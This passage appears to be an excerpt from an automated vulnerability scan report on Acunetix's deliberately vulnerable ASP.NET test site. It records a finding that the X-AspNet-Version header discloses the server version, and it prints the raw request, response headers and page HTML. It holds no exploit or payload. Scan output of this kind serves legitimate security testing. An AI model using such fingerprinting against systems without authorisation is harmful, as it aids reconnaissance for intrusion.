gdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH//aNq1Q9scKgXRi5G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:03 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VG